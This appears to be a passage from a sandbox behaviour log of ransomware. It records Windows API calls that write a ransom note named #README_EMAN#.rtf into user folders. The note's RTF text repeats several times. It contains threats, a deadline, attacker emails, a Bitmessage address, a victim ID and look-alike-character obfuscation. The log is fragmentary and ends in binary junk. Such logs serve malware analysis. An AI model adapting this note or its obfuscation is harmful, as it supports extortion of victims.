\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.847] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.847] CloseHandle (hObject=0x2ec) returned 1 [0284.847] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0284.848] GetLastError () returned 0x2 [0284.848] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 